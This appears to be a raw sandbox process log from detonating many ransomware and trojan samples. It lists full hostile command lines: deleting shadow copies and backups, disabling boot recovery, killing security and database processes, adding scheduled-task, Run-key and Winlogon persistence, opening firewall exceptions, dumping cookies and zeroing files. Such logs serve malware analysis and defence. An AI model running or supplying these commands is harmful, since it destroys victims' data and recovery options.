C:\Users\Admin\AppData\Local\Temp\7zS49532F59\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS49532F59\setup_install.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_8.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5564 -ip 5564
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 484
C:\Users\Admin\AppData\Local\Temp\discord.exe
"C:\Users\Admin\AppData\Local\Temp\discord.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\install\MicroDate.exe
C:\Windows\install\MicroDate.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_1.exe
arnatic_1.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_3.exe
arnatic_3.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_2.exe
arnatic_2.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_5.exe
arnatic_5.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_6.exe
arnatic_6.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
arnatic_7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6200 -ip 6200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5976 -ip 5976
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windowsdefendertask" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-057c923e5566490537ba9a97d880cdfab172c3c329102a4e1955d17a13349f50.exe
HEUR-Trojan.MSIL.Crypt.gen-057c923e5566490537ba9a97d880cdfab172c3c329102a4e1955d17a13349f50.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_4.exe
arnatic_4.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_8.exe
arnatic_8.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 668
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6420 -ip 6420
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 380
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe
HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-1fa9bed9d75dc028cbd7981fa4152a58a5762deb1a9b67a1d7ea9b8f3fbaf2a3.exe
HEUR-Trojan.MSIL.Crypt.gen-1fa9bed9d75dc028cbd7981fa4152a58a5762deb1a9b67a1d7ea9b8f3fbaf2a3.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VWYQ1dFdRvFq.bat" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-29c3861feead5d99c7d2e4c1a50dd6b29f8ca4d8add002ca8028d2f876abbbeb.exe
HEUR-Trojan.MSIL.Crypt.gen-29c3861feead5d99c7d2e4c1a50dd6b29f8ca4d8add002ca8028d2f876abbbeb.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\321b0ed3-0705-495f-b8d7-50a422a526c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-3a21f279c960064cfccdaf1d5baf116ab6a888b235744accba27a1a38b0ec9d6.exe
HEUR-Trojan.MSIL.Crypt.gen-3a21f279c960064cfccdaf1d5baf116ab6a888b235744accba27a1a38b0ec9d6.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6404 -ip 6404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 1916
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-54920b6428a47f26167fa633550d0dffb12ec4981ede7f4e7ec9ad08948432f1.exe
HEUR-Trojan.MSIL.Crypt.gen-54920b6428a47f26167fa633550d0dffb12ec4981ede7f4e7ec9ad08948432f1.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-62a1d962d59b42f23a64fa0c755658c99330bbbdfa03567cc31ec8e6ac165255.exe
HEUR-Trojan.MSIL.Crypt.gen-62a1d962d59b42f23a64fa0c755658c99330bbbdfa03567cc31ec8e6ac165255.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-63745b9e47b0e4b40164cb99c0335f78bdc880ce3fc668ea56902a0cad19b0df.exe
HEUR-Trojan.MSIL.Crypt.gen-63745b9e47b0e4b40164cb99c0335f78bdc880ce3fc668ea56902a0cad19b0df.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-6b15348763895d929ef27e7e014834bb95bc7c5bdf1607dd7c8b0eac3ff45fd4.exe
HEUR-Trojan.MSIL.Crypt.gen-6b15348763895d929ef27e7e014834bb95bc7c5bdf1607dd7c8b0eac3ff45fd4.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-6d3e25cfe701bac6f08302a46c7db8029a771c30ff83fe758d04dbaea7c6b971.exe
HEUR-Trojan.MSIL.Crypt.gen-6d3e25cfe701bac6f08302a46c7db8029a771c30ff83fe758d04dbaea7c6b971.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-71609c370ed4d3d62069401d753b937faf2dc66c0003409999946f5eb1046816.exe
HEUR-Trojan.MSIL.Crypt.gen-71609c370ed4d3d62069401d753b937faf2dc66c0003409999946f5eb1046816.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-778a433f0c438f5f4ad261e0c14d350e37f10d8fe4ca7794da84052aa114f94c.exe
HEUR-Trojan.MSIL.Crypt.gen-778a433f0c438f5f4ad261e0c14d350e37f10d8fe4ca7794da84052aa114f94c.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-861c62fc1b264801e17d6a61ac6579a3b7d6d39e2f35aec69fc1b8300f42c953.exe
HEUR-Trojan.MSIL.Crypt.gen-861c62fc1b264801e17d6a61ac6579a3b7d6d39e2f35aec69fc1b8300f42c953.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-95bfcb9ec97978061e11529df66763e557b1594430867ee63cde0f115bbef933.exe
HEUR-Trojan.MSIL.Crypt.gen-95bfcb9ec97978061e11529df66763e557b1594430867ee63cde0f115bbef933.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-9ade8e3be001803151f0013e9e36c53ce9b8f7aed9841a8950084e396979b164.exe
HEUR-Trojan.MSIL.Crypt.gen-9ade8e3be001803151f0013e9e36c53ce9b8f7aed9841a8950084e396979b164.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-9ae361667dede244ad234a15e0cd652b17a4213c1d80d249aeb7f8dcc1fd71f7.exe
HEUR-Trojan.MSIL.Crypt.gen-9ae361667dede244ad234a15e0cd652b17a4213c1d80d249aeb7f8dcc1fd71f7.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a1e497a85d0c490c223de6debe48544c4670c83e92d409d541da9e4372f3b673.exe
HEUR-Trojan.MSIL.Crypt.gen-a1e497a85d0c490c223de6debe48544c4670c83e92d409d541da9e4372f3b673.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\SysWOW64\nslookup.exe
C:\Windows\SysWOW64\nslookup.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a4e5b35dfb545696862a74a499546719823828844203cbfc50965b6fd54ed9c4.exe
HEUR-Trojan.MSIL.Crypt.gen-a4e5b35dfb545696862a74a499546719823828844203cbfc50965b6fd54ed9c4.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Users\Admin\AppData\Local\Temp\wind.exe
"C:\Users\Admin\AppData\Local\Temp\wind.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a5d7dc1f0a8570c6e84fa51e259025a5b09594ba8c11a632ac95df7eed359d5d.exe
HEUR-Trojan.MSIL.Crypt.gen-a5d7dc1f0a8570c6e84fa51e259025a5b09594ba8c11a632ac95df7eed359d5d.exe
C:\Users\Admin\RuntimeBroker.exe
"C:\Users\Admin\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a8117089f8fed4a9f732895d6068beeb87627bdf08d56196a75929bec02326e6.exe
HEUR-Trojan.MSIL.Crypt.gen-a8117089f8fed4a9f732895d6068beeb87627bdf08d56196a75929bec02326e6.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ac4c879915e9429ce43900b2efd56becc50c842b6d70f2328a3ad40f749c675f.exe
HEUR-Trojan.MSIL.Crypt.gen-ac4c879915e9429ce43900b2efd56becc50c842b6d70f2328a3ad40f749c675f.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe
HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-c130ea959e49d716170b04de5e49c97d4bee1e54905a33f22fda80afcef1dd73.exe
HEUR-Trojan.MSIL.Crypt.gen-c130ea959e49d716170b04de5e49c97d4bee1e54905a33f22fda80afcef1dd73.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\wind.exe" "wind.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\Steam.exe
"C:\Windows\Steam.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Windows\Steam.exe"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-c5501222fa725c82f0e978d2bfdc1b8435dd7784b21e532531ec2e107077aa5c.exe
HEUR-Trojan.MSIL.Crypt.gen-c5501222fa725c82f0e978d2bfdc1b8435dd7784b21e532531ec2e107077aa5c.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "hdgse" /t REG_SZ /d "C:\Users\Admin\Music\opeir.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d4cd3c969a24c05c57e7381db22c9ce662a785cfe815372385746967fb75deb7.exe
HEUR-Trojan.MSIL.Crypt.gen-d4cd3c969a24c05c57e7381db22c9ce662a785cfe815372385746967fb75deb7.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "hdgse" /t REG_SZ /d "C:\Users\Admin\Music\opeir.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe
HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windowsdefendertask" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-e819055cd0c4b64408c03b4e6fabc0185c05bc4f6056ce0b98f9fa257371b984.exe
HEUR-Trojan.MSIL.Crypt.gen-e819055cd0c4b64408c03b4e6fabc0185c05bc4f6056ce0b98f9fa257371b984.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-e95e2e16abd42f380c142cdbc9b545cdb32076ffebc3021ba5e7503d6e292d35.exe
HEUR-Trojan.MSIL.Crypt.gen-e95e2e16abd42f380c142cdbc9b545cdb32076ffebc3021ba5e7503d6e292d35.exe
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1032 -ip 1032
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ec6af3530e12f450657a1a54e44580dfd29e32a46d888c694967573b0796f3f2.exe
HEUR-Trojan.MSIL.Crypt.gen-ec6af3530e12f450657a1a54e44580dfd29e32a46d888c694967573b0796f3f2.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8nKAsTBg82Gl.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 856
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
